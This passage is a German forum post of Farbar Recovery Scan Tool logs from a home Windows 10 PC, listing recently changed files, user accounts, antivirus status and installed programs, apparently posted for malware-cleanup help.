2020-12-01 05:06 - 2017-12-04 20:39 - 000000000 ____D C:\Users\Tom\AppData\Roaming\Origin
2020-11-29 23:36 - 2017-12-27 17:28 - 000000000 ____D C:\Users\Tom\.mediathek3
2020-11-29 17:05 - 2017-12-04 20:40 - 000000000 ____D C:\Program Files (x86)\Origin Games
2020-11-29 12:03 - 2018-03-20 16:18 - 000000000 ____D C:\Users\Tom\Desktop\Ebay-Bilder
2020-11-28 20:33 - 2019-05-10 21:11 - 000000000 ____D C:\Users\Vincent\AppData\Roaming\Discord
2020-11-28 20:33 - 2017-12-02 13:07 - 000000000 ____D C:\Users\Vincent\AppData\LocalLow\Mozilla
2020-11-28 20:31 - 2020-02-19 14:17 - 000000000 ____D C:\Users\Vincent\AppData\Local\Ubisoft Game Launcher
2020-11-28 20:29 - 2017-12-02 13:05 - 000000000 ___RD C:\Users\Vincent\OneDrive
2020-11-28 20:28 - 2020-02-13 21:08 - 000001434 _____ C:\Users\Vincent\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Browser Opera GX.lnk
2020-11-28 20:28 - 2019-05-10 21:11 - 000000000 ____D C:\Users\Vincent\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Discord Inc
2020-11-28 20:28 - 2019-05-10 21:11 - 000000000 ____D C:\Users\Vincent\AppData\Local\Discord
2020-11-28 20:27 - 2017-12-02 13:04 - 000000000 ___RD C:\Users\Vincent\3D Objects
2020-11-28 20:27 - 2017-12-02 13:04 - 000000000 ____D C:\Users\Vincent\AppData\Local\Packages
2020-11-28 19:58 - 2017-12-01 17:39 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2020-11-28 19:57 - 2017-12-06 18:20 - 000000000 ____D C:\Users\Tom_Admin\AppData\Roaming\Origin
2020-11-28 19:53 - 2018-11-21 19:15 - 000000000 ____D C:\Users\Tom_Admin\Documents\Command and Conquer Generals Zero Hour Data
2020-11-28 19:44 - 2017-12-04 20:38 - 000000000 ____D C:\Users\Tom_Admin\AppData\Local\Origin
2020-11-28 18:49 - 2017-12-04 21:48 - 000000000 ____D C:\Users\Tom\Documents\Command and Conquer Generals Zero Hour Data
2020-11-27 13:35 - 2019-04-05 07:38 - 000000000 ____D C:\Program Files (x86)\StarMoney 12 Basic
2020-11-25 12:56 - 2020-03-23 18:41 - 000028432 _____ C:\Users\Tom\Desktop\Corona-Entwicklung.xlsx
2020-11-25 08:33 - 2020-03-05 20:01 - 000002136 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2020-11-24 20:40 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\Macromed
2020-11-24 20:36 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\Macromed
2020-11-24 11:48 - 2017-12-27 17:34 - 000000000 ____D C:\Users\Tom\AppData\Roaming\vlc
2020-11-24 10:54 - 2017-12-01 17:39 - 000001005 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk
2020-11-19 23:49 - 2020-09-30 01:00 - 000000000 ____D C:\Program Files\Microsoft Update Health Tools
2020-11-16 22:07 - 2020-09-30 01:00 - 000722760 _____ (Microsoft Corporation) C:\WINDOWS\system32\sedplugins.dll
2020-11-16 22:07 - 2020-09-30 01:00 - 000470344 _____ (Microsoft Corporation) C:\WINDOWS\system32\QualityUpdateAssistant.dll
2020-11-16 10:31 - 2019-04-08 06:22 - 000000000 ____D C:\Users\Tom\AppData\Local\Garmin
2020-11-16 10:30 - 2018-03-04 23:10 - 000000000 ____D C:\ProgramData\Garmin
2020-11-16 10:30 - 2018-03-04 23:10 - 000000000 ____D C:\Program Files (x86)\Garmin
2020-11-16 10:30 - 2017-12-02 07:41 - 000000000 ____D C:\ProgramData\Package Cache
2020-11-15 13:40 - 2019-07-18 09:27 - 000000000 ____D C:\Program Files (x86)\Microsoft Office
2020-11-11 17:51 - 2019-12-07 15:54 - 000000000 ____D C:\Program Files\Windows Defender Advanced Threat Protection
2020-11-11 17:51 - 2019-12-07 10:14 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2020-11-11 17:51 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\setup
2020-11-11 17:51 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SystemResources
2020-11-11 17:51 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2020-11-11 17:51 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\setup
2020-11-11 17:51 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\oobe
2020-11-11 17:51 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\migwiz
2020-11-11 17:51 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\ShellExperiences
2020-11-11 17:51 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\PolicyDefinitions
2020-11-11 17:51 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\bcastdvr
2020-11-11 07:45 - 2019-12-07 10:18 - 000842296 _____ (Adobe) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2020-11-11 07:45 - 2019-12-07 10:18 - 000175160 _____ (Adobe) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2020-11-11 07:10 - 2019-12-07 10:03 - 000000000 ____D C:\WINDOWS\servicing
2020-11-11 07:10 - 2019-12-07 10:03 - 000000000 ____D C:\WINDOWS\CbsTemp
2020-11-11 07:05 - 2017-12-02 01:07 - 000000000 ____D C:\WINDOWS\system32\MRT
2020-11-11 07:03 - 2017-12-02 01:07 - 133736600 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2020-11-11 04:29 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\appcompat
2020-11-10 11:16 - 2019-12-07 10:14 - 000000000 ___RD C:\WINDOWS\PrintDialog
2020-11-10 11:16 - 2017-12-02 13:41 - 000000000 ____D C:\Users\Tom\AppData\Local\Packages
2020-11-10 11:00 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\Registration
2020-11-10 11:00 - 2019-12-07 10:14 - 000000000 ____D C:\ProgramData\USOPrivate
2020-11-10 11:00 - 2019-12-07 10:03 - 000032768 _____ C:\WINDOWS\system32\config\ELAM
2020-11-10 11:00 - 2018-07-03 15:27 - 000000000 ____D C:\ProgramData\Packages
2020-11-10 11:00 - 2017-12-02 13:41 - 000000000 ___RD C:\Users\Tom\3D Objects
2020-11-10 10:59 - 2019-12-07 10:14 - 000000000 ____D C:\Program Files\Windows Defender
2020-11-10 10:57 - 2018-05-02 06:16 - 000023056 _____ C:\WINDOWS\system32\emptyregdb.dat
2020-11-10 10:54 - 2019-12-28 14:50 - 000000000 ____D C:\temp
2020-11-10 10:54 - 2017-12-02 07:33 - 000000000 ____D C:\Program Files\NVIDIA Corporation
2020-11-10 10:54 - 2017-12-01 17:41 - 000000000 ____D C:\WINDOWS\SysWOW64\RTCOM
2020-11-10 10:54 - 2017-12-01 17:41 - 000000000 ____D C:\WINDOWS\system32\DAX2
2020-11-10 10:53 - 2020-10-17 18:46 - 000000000 ____D C:\Users\Tom\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OpenAudible
2020-11-10 10:53 - 2020-08-31 10:06 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PDF24
2020-11-10 10:53 - 2020-05-13 21:04 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office Tools
2020-11-10 10:53 - 2020-05-13 16:44 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office
2020-11-10 10:53 - 2020-03-30 12:49 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MozBackup
2020-11-10 10:53 - 2020-02-25 22:17 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OBS Studio
2020-11-10 10:53 - 2020-02-21 11:55 - 000000000 ____D C:\WINDOWS\system32\appmgmt
2020-11-10 10:53 - 2020-02-13 21:11 - 000000000 ____D C:\Users\Vincent\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Medal B.V
2020-11-10 10:53 - 2020-02-10 15:22 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SpeedCommander 17 (x64)
2020-11-10 10:53 - 2020-01-11 18:20 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\T16 Wired Gaming Mouse
2020-11-10 10:53 - 2019-12-07 10:14 - 000028672 _____ C:\WINDOWS\system32\config\BCD-Template
2020-11-10 10:53 - 2019-12-07 10:14 - 000000000 __RHD C:\Users\Public\Libraries
2020-11-10 10:53 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\WinBioDatabase
2020-11-10 10:53 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\spool
2020-11-10 10:53 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\NDF
2020-11-10 10:53 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\ServiceState
2020-11-10 10:53 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\LiveKernelReports
2020-11-10 10:53 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\IME
2020-11-10 10:53 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\Help
2020-11-10 10:53 - 2019-12-07 10:14 - 000000000 ____D C:\Program Files\Common Files\microsoft shared
2020-11-10 10:53 - 2019-11-04 12:29 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\RV-Print 2.0
2020-11-10 10:53 - 2019-10-07 11:34 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ProgTV 2 (x64)
2020-11-10 10:53 - 2019-08-26 16:11 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Ant Renamer
2020-11-10 10:53 - 2019-08-25 17:26 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Advanced Renamer
2020-11-10 10:53 - 2019-08-23 08:30 - 000000000 ____D C:\Users\Tom_Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startfenster-Replace
2020-11-10 10:53 - 2019-08-21 23:24 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Anthem™
2020-11-10 10:53 - 2019-07-19 18:40 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Krita
2020-11-10 10:53 - 2019-06-19 11:04 - 000000000 ____D C:\Program Files\UNP
2020-11-10 10:53 - 2019-06-17 20:35 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Drakonia Black
2020-11-10 10:53 - 2019-04-05 07:38 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StarMoney 12 Basic
2020-11-10 10:53 - 2019-03-23 13:36 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WAF-Programme
2020-11-10 10:53 - 2019-03-19 05:52 - 000000000 ____D C:\WINDOWS\system32\Tasks_Migrated
2020-11-10 10:53 - 2018-10-05 17:33 - 000000000 ___RD C:\Program Files\Microsoft Games
2020-11-10 10:53 - 2018-10-05 17:33 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2020-11-10 10:53 - 2018-10-05 09:41 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mein CEWE FOTOBUCH
2020-11-10 10:53 - 2018-10-05 09:08 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lidl-Fotos
2020-11-10 10:53 - 2018-07-03 17:01 - 000000000 ____D C:\Users\Vincent\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2020-11-10 10:53 - 2018-04-17 15:56 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Das Telefonbuch Gelbe Seiten Map & Route
2020-11-10 10:53 - 2018-04-14 19:20 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\LEGO Company
2020-11-10 10:53 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\system32\MsDtc
2020-11-10 10:53 - 2018-03-04 18:02 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Plex Media Server
2020-11-10 10:53 - 2018-01-20 16:46 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\News File Grabber
2020-11-10 10:53 - 2017-12-27 17:34 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VideoLAN
2020-11-10 10:53 - 2017-12-27 17:27 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2020-11-10 10:53 - 2017-12-16 14:28 - 000000000 ____D C:\Users\Vincent\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Pokémon Trading Card Game Online
2020-11-10 10:53 - 2017-12-11 12:29 - 000000000 ____D C:\Users\Tom\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2020-11-10 10:53 - 2017-12-10 20:21 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Hauppauge WinTV
2020-11-10 10:53 - 2017-12-10 12:52 - 000000000 ____D C:\Users\Tom\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Phase 5 HTML-Editor
2020-11-10 10:53 - 2017-12-09 21:52 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Steam
2020-11-10 10:53 - 2017-12-05 20:24 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Command and Conquer The Ultimate Collection Additional Content
2020-11-10 10:53 - 2017-12-05 20:23 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Westwood Chat
2020-11-10 10:53 - 2017-12-05 19:26 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Westwood Online
2020-11-10 10:53 - 2017-12-04 22:20 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Biet-O-Matic
2020-11-10 10:53 - 2017-12-04 20:38 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Origin
2020-11-10 10:53 - 2017-12-03 23:06 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StarMoney 11
2020-11-10 10:53 - 2017-12-03 19:57 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Minecraft
2020-11-10 10:53 - 2017-12-03 13:10 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Battle.net
2020-11-10 10:53 - 2017-12-02 17:43 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Synology
2020-11-10 10:53 - 2017-12-02 07:33 - 000000000 ____D C:\Program Files (x86)\NVIDIA Corporation
2020-11-10 10:53 - 2017-12-02 01:11 - 000000000 ____D C:\Users\Tom_Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\QuickPar
2020-11-10 10:53 - 2017-12-02 01:10 - 000000000 ____D C:\Users\Tom_Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SABnzbd
2020-11-10 10:53 - 2017-12-02 01:08 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Ghostscript
2020-11-10 10:53 - 2017-12-02 00:35 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip
2020-11-10 10:53 - 2017-12-02 00:34 - 000000000 ____D C:\Users\Tom_Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR
2020-11-10 10:53 - 2017-12-02 00:34 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR
2020-11-10 10:53 - 2017-12-02 00:30 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\calibre 64bit - E-book Management
2020-11-10 10:53 - 2017-12-02 00:27 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MyPhoneExplorer
2020-11-10 10:53 - 2017-12-01 23:57 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack
2020-11-10 10:53 - 2017-12-01 23:46 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\IrfanView
2020-11-10 10:53 - 2017-12-01 21:41 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SpeedCommander 16 (x64)
2020-11-10 10:53 - 2017-09-29 14:46 - 000000000 ___HD C:\WINDOWS\system32\GroupPolicy
2020-11-10 10:52 - 2019-12-07 10:18 - 000000000 ____D C:\WINDOWS\Setup
2020-11-10 09:46 - 2020-02-27 21:43 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FlashIntegro
2020-11-10 09:46 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\Resources
2020-11-10 09:46 - 2019-07-18 18:14 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Wondershare
2020-11-10 09:46 - 2018-10-12 11:47 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation
2020-11-10 09:46 - 2018-09-07 15:33 - 000000000 ____D C:\WINDOWS\system32\Drivers\NVIDIA Corporation
2020-11-10 09:46 - 2017-12-01 17:41 - 000000000 ____D C:\Program Files\Realtek
2020-11-10 09:46 - 2017-12-01 17:40 - 000000000 ____D C:\Program Files\Intel
2020-11-10 09:45 - 2020-02-27 20:14 - 000000000 ____D C:\Users\Tom_Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Blackmagic Design
2020-11-10 09:45 - 2017-12-04 21:58 - 000000000 ____D C:\Users\Tom_Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Ubisoft
2020-11-10 09:43 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\SysWOW64\F12
2020-11-10 09:43 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\WinMetadata
2020-11-10 09:43 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\oobe
2020-11-10 09:43 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\migwiz
2020-11-10 09:43 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\Dism
2020-11-10 09:43 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\Com
2020-11-10 09:43 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\AdvancedInstallers
2020-11-10 09:42 - 2019-12-07 15:54 - 000023552 _____ (Microsoft Corporation) C:\WINDOWS\system32\OEMDefaultAssociations.dll
2020-11-10 09:42 - 2019-12-07 15:54 - 000020908 _____ C:\WINDOWS\system32\OEMDefaultAssociations.xml
2020-11-10 09:42 - 2019-12-07 15:54 - 000000000 ___SD C:\WINDOWS\system32\AppV
2020-11-10 09:42 - 2019-12-07 15:54 - 000000000 ____D C:\Program Files\Windows Photo Viewer
2020-11-10 09:42 - 2019-12-07 15:54 - 000000000 ____D C:\Program Files (x86)\Windows Photo Viewer
2020-11-10 09:42 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\system32\UNP
2020-11-10 09:42 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\system32\F12
2020-11-10 09:42 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\system32\DiagSvcs
2020-11-10 09:42 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\WinMetadata
2020-11-10 09:42 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\SystemResetPlatform
2020-11-10 09:42 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\Sysprep
2020-11-10 09:42 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\ShellExperiences
2020-11-10 09:42 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\PerceptionSimulation
2020-11-10 09:42 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\es-MX
2020-11-10 09:42 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\Dism
2020-11-10 09:42 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\Com
2020-11-10 09:42 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\appraiser
2020-11-10 09:42 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\AdvancedInstallers
2020-11-10 09:42 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\ShellComponents
2020-11-10 09:42 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\Provisioning
2020-11-10 09:42 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\DiagTrack
2020-11-10 09:42 - 2019-12-07 10:14 - 000000000 ____D C:\Program Files\Common Files\System
2020-11-10 09:36 - 2019-12-07 15:53 - 000000000 ____D C:\WINDOWS\OCR
2020-11-10 09:35 - 2019-12-07 15:51 - 000000000 ____D C:\WINDOWS\SysWOW64\winrm
2020-11-10 09:35 - 2019-12-07 15:51 - 000000000 ____D C:\WINDOWS\SysWOW64\WCN
2020-11-10 09:35 - 2019-12-07 15:51 - 000000000 ____D C:\WINDOWS\SysWOW64\slmgr
2020-11-10 09:35 - 2019-12-07 15:51 - 000000000 ____D C:\WINDOWS\SysWOW64\Printing_Admin_Scripts
2020-11-10 09:35 - 2019-12-07 15:51 - 000000000 ____D C:\WINDOWS\system32\winrm
2020-11-10 09:35 - 2019-12-07 15:51 - 000000000 ____D C:\WINDOWS\system32\WCN
2020-11-10 09:35 - 2019-12-07 15:51 - 000000000 ____D C:\WINDOWS\system32\slmgr
2020-11-10 09:35 - 2019-12-07 15:51 - 000000000 ____D C:\WINDOWS\system32\Printing_Admin_Scripts
2020-11-10 09:35 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\SysWOW64\DiagSvcs
2020-11-10 09:35 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\system32\dsc
2020-11-10 09:35 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\lv-LV
2020-11-10 09:35 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\lt-LT
2020-11-10 09:35 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\et-EE
2020-11-10 09:35 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\es-MX
2020-11-10 09:35 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\lv-LV
2020-11-10 09:35 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\lt-LT
2020-11-10 09:35 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\et-EE
2020-11-10 09:35 - 2019-12-07 10:14 - 000000000 ____D C:\Program Files (x86)\Windows Defender
2020-11-10 09:33 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\MUI
2020-11-10 09:33 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\MUI
2020-11-06 22:05 - 2020-07-12 16:42 - 000000877 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Notepad++.lnk
2020-11-06 22:05 - 2020-07-12 16:42 - 000000865 _____ C:\Users\Public\Desktop\Notepad++.lnk
2020-11-06 22:05 - 2020-07-12 16:42 - 000000865 _____ C:\ProgramData\Desktop\Notepad++.lnk
2020-11-06 22:05 - 2020-07-12 16:42 - 000000000 ____D C:\Users\Tom_Admin\AppData\Roaming\Notepad++
2020-11-06 14:19 - 2018-02-25 10:17 - 000000000 ____D C:\WINDOWS\system32\Drivers\wd
2020-11-05 22:37 - 2017-12-02 13:42 - 000000000 ____D C:\Users\Tom\AppData\Local\PlaceholderTileLogoFolder

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse ========

2020-02-27 21:21 - 2020-02-27 21:42 - 150155571 _____ () C:\Program Files\video_editor_642.zip
2020-02-27 21:23 - 2020-02-20 13:43 - 070052768 _____ (Flash-Integro LLC                                          ) C:\Program Files\video_editor_x32.exe
2020-02-27 21:23 - 2020-02-20 13:43 - 080208568 _____ (Flash-Integro LLC                                          ) C:\Program Files\video_editor_x64.exe
2020-11-28 19:48 - 2020-12-02 22:38 - 000061440 _____ () C:\Users\Tom\AppData\Roaming\cookies.sqlite
2018-02-25 11:07 - 2020-07-30 10:09 - 000006656 _____ () C:\Users\Tom\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2019-07-19 18:42 - 2020-02-10 16:43 - 000012780 _____ () C:\Users\Tom\AppData\Local\krita.log
2020-02-10 16:43 - 2020-02-10 16:43 - 000000039 _____ () C:\Users\Tom\AppData\Local\kritadisplayrc
2019-07-19 18:42 - 2019-07-19 18:44 - 000014167 _____ () C:\Users\Tom\AppData\Local\kritarc
2020-01-25 13:06 - 2020-01-25 13:06 - 000000859 _____ () C:\Users\Tom\AppData\Local\recently-used.xbel

==================== SigCheck ============================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

==================== Ende von FRST.txt ========================
--- --- ---

Rupsi 02.12.2020 22:59
Code:
Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 02-12-2020
durchgeführt von Tom (02-12-2020 22:56:19)
Gestartet von C:\Users\Tom\Desktop
Windows 10 Pro Version 2004 19041.630 (X64) (2020-11-10 10:00:01)
Start-Modus: Normal
==========================================================


==================== Konten: =============================

Administrator (S-1-5-21-3451750051-380284315-2914928687-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-3451750051-380284315-2914928687-503 - Limited - Disabled)
Gast (S-1-5-21-3451750051-380284315-2914928687-501 - Limited - Disabled)
Tom (S-1-5-21-3451750051-380284315-2914928687-1002 - Administrator - Enabled) => C:\Users\Tom
Tom_Admin (S-1-5-21-3451750051-380284315-2914928687-1001 - Administrator - Enabled) => C:\Users\Tom_Admin
Vincent (S-1-5-21-3451750051-380284315-2914928687-1003 - Limited - Enabled) => C:\Users\Vincent
WDAGUtilityAccount (S-1-5-21-3451750051-380284315-2914928687-504 - Limited - Disabled)

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Malwarebytes (Enabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

4K YouTube to MP3 3.7 (HKLM-x32\...\{C4B2ABD0-F2D6-47C6-B1BE-320A060A5485}) (Version: 3.7.0.2852 - Open Media LLC)
7-Zip 18.05 (x64) (HKLM\...\7-Zip) (Version: 18.05 - Igor Pavlov)
Adobe Acrobat Reader DC - Deutsch (HKLM-x32\...\{AC76BA86-7AD7-1031-7B44-AC0F074E4100}) (Version: 20.013.20066 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 32.0.0.125 - Adobe)
Advanced Renamer (HKLM-x32\...\Advanced Renamer_is1) (Version: 3.85 - Hulubulu Software)
ANT Drivers Installer x64 (HKLM\...\{16BA964D-698D-4663-8FA7-B9613DA7958B}) (Version: 2.3.4 - Garmin Ltd or its subsidiaries) Hidden
Ant Renamer (HKLM-x32\...\Ant Renamer 2_is1) (Version: 2.12.0 - Ant Software)
Anthem™ (HKLM-x32\...\{57b4eaa0-f1f5-407e-afbd-2db397381ad8}) (Version: 1.0.64.24016 - Electronic Arts)
Battle.net (HKLM-x32\...\Battle.net) (Version:  - Blizzard Entertainment)
Biet-O-Matic v2.14.14 (HKLM-x32\...\Biet-O-Matic v2.14.14) (Version: 2.14.14 - BOM Development Team)
BQ Firmware Flash Tool version 3.0.4 (HKLM-x32\...\{58946287-F553-4D93-AC53-8296836A500A}_is1) (Version: 3.0.4 - Mundo Reader S.L.)
calibre 64bit (HKLM\...\{3BB5C110-3153-47C8-B845-AA5F57C3C0A7}) (Version: 4.14.0 - Kovid Goyal)
CDBurnerXP (HKLM-x32\...\{7E265513-8CDA-4631-B696-F40D983F3B07}_is1) (Version: 4.5.8.7128 - CDBurnerXP)
Command & Conquer™ The Ultimate Collection Additional Content (HKLM-x32\...\{1A882F29-BC18-4AC2-A71E-0FC30FA32568}) (Version: 1.0.0.0 - Electronic Arts)
Command & Conquer™: Generals and Zero Hour (HKLM-x32\...\{609F6FD5-4B22-4D7A-AD30-8C9DD480D5BE}) (Version: 1.0.0.0 - Electronic Arts, Inc.)
Das Telefonbuch Gelbe Seiten Map & Route (HKLM-x32\...\DasTelefonbuch Gelbe Seiten Map & Route) (Version:  - TVG Telefonbuch- und Verzeichnisverlag GmbH & Co. KG)
DaVinci Resolve (HKLM\...\{5913037B-95C8-4A27-8F37-026BBC7B5AF1}) (Version: 16.1.2026 - Blackmagic Design)
Destiny 2 (HKLM-x32\...\Destiny 2) (Version:  - Blizzard Entertainment)
DisplayDriverAnalyzer (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_DisplayDriverAnalyzer) (Version: 416.34 - NVIDIA Corporation) Hidden
Drakonia Black (HKLM-x32\...\{2EAD3327-2F92-455F-A675-E5CC4980B67A}}_is1) (Version:  - )
